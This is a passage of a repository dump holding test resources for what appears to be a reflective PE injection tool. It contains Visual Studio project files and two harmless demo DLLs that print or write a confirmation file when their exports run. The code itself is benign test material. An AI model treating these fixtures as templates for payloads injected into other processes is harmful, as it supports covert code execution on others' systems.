    "content": "// DemoDLL.cpp : Defines the exported functions for the DLL application.\n//\n\n#include \"stdafx.h\"\n#include \"DemoDLL.h\"\n\nusing namespace std;\n\n\nextern \"C\" __declspec( dllexport ) char* StringFunc()\n{\n\tostream *outputStream = NULL;\n\n\t//If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.\n\t//outputStream = &cout;\n\n\tostringstream *stringStream = new ostringstream();\n\toutputStream = stringStream;\n\t\n\t(*outputStream) << \"String DLL function is working\" << endl << endl;\n\n\tstring output = (*stringStream).str();\n\tconst char* outputStr = output.c_str();\n\n\tchar* out = new char[output.size()+1];\n\tstrcpy(out, outputStr);\n\tout[output.size()] = '\\0';\n\n\n\treturn out;\n}\n\nextern \"C\" __declspec( dllexport ) void VoidFunc()\n{\n\tprintf(\"Void DLL function is working, using printf to display. You will only see this if you run locally.\\n\\n\");\n\treturn;\n}\n\nextern \"C\" __declspec( dllexport ) wchar_t* WStringFunc()\n{\n\twostream *outputStream = NULL;\n\n\t//If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.\n\toutputStream = &wcout;\n\n\twostringstream *stringStream = new wostringstream();\n\toutputStream = stringStream;\n\t\n\t(*outputStream) << L\"WString DLL function is working\" << endl << endl;\n\n\twstring output = (*stringStream).str();\n\tconst wchar_t* outputStr = output.c_str();\n\n\twchar_t* out = new wchar_t[output.size()+1];\n\twcscpy(out, outputStr);\n\tout[output.size()] = '\\0';\n\n\n\treturn out;\n}"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h",
    "content": "// The following ifdef block is the standard way of creating macros which make exporting \n// from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS\n// symbol defined on the command line. This symbol should not be defined on any project\n// that uses this DLL. This way any other project whose source files include this file see \n// DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols\n// defined with this macro as being exported.\n#ifdef DEMODLL_EXPORTS\n#define DEMODLL_API __declspec(dllexport)\n#else\n#define DEMODLL_API __declspec(dllimport)\n#endif\n\nusing namespace std;\n\nextern \"C\" __declspec( dllexport ) char* StringFunc();\nextern \"C\" __declspec( dllexport ) void VoidFunc();\nextern \"C\" __declspec( dllexport ) wchar_t* WStringFunc();"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>DemoDLL</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <None Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"DemoDLL.h\" />\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"DemoDLL.cpp\" />\n    <ClCompile Include=\"dllmain.cpp\">\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n      </PrecompiledHeader>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n      </PrecompiledHeader>\n    </ClCompile>\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"DemoDLL.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"DemoDLL.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt",
    "content": "========================================================================\n    DYNAMIC LINK LIBRARY : DemoDLL Project Overview\n========================================================================\n\nAppWizard has created this DemoDLL DLL for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your DemoDLL application.\n\n\nDemoDLL.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nDemoDLL.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nDemoDLL.cpp\n    This is the main DLL source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named DemoDLL.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp",
    "content": "// dllmain.cpp : Defines the entry point for the DLL application.\n#include \"stdafx.h\"\n\nBOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved\n\t\t\t\t\t )\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// DemoDLL.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files:\n#include <windows.h>\n#include <string>\n#include <ostream>\n#include <sstream>\n#include <iostream>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 11.00\n# Visual Studio 2010\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"DemoDLL\", \"DemoDLL\\DemoDLL.vcxproj\", \"{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64\n\t\t{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp",
    "content": "// DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.\n//\n\n#include \"stdafx.h\"\n\nusing namespace std;\n\nextern \"C\" __declspec( dllexport ) void VoidFunc();\n\n\nextern \"C\" __declspec( dllexport ) void VoidFunc()\n{\n\tofstream myfile;\n\t_mkdir(\"c:\\\\ReflectiveLoaderTest\");\n\tmyfile.open (\"c:\\\\ReflectiveLoaderTest\\\\DllVoidFunction.txt\");\n\tmyfile << \"Dll Void function successfully called.\\n\";\n\tmyfile.close();\n\treturn;\n}"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>DemoDLL_RemoteProcess</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"DemoDLL_RemoteProcess.cpp\" />\n    <ClCompile Include=\"dllmain.cpp\">\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n      </PrecompiledHeader>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n      </PrecompiledHeader>\n    </ClCompile>\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup 